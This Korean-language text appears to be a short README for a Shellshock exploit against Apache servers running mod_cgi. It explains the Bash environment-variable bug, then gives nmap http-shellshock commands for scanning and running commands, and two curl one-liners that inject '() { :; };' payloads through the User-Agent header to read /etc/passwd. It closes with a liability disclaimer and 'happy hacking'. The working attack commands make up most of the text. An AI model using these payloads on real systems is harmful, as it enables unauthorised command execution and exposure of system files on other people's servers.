
"Shellshock" 취약점 악용. mod_cgi를 사용하는 Apache에서의 원격 코드 실행
Shellshock는 BASH에서 발생하는 원격 명령 실행(Remote Command Execution) 취약점입니다. 이 스크립트는 mod_cgi가 활성화된 Apache 또는 유사한 웹 환경에서 이 취약점을 악용합니다. 취약점은 환경 변수 조작에 있으며, 환경 변수는 컴퓨터에서 프로세스가 실행되는 방식에 영향을 미치는 동적 이름-값 쌍입니다. 공격자는 악성 코드를 환경 변수에 첨부하여 변수를 받는 즉시 실행되도록 함으로써 이를 악용할 수 있습니다. 이를 통해 공격자는 시스템을 손상시킬 수 있습니다.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
이 도구로 인한 불법적인 사용이나 피해에 대해 저는 책임을 지지 않습니다. 이 도구는 재미로 작성된 것이지 악의적인 목적이 아니며, 해킹과 사이버 보안에 대한 인식을 높이기 위한 것입니다.
즐거운 해킹 되세요 :)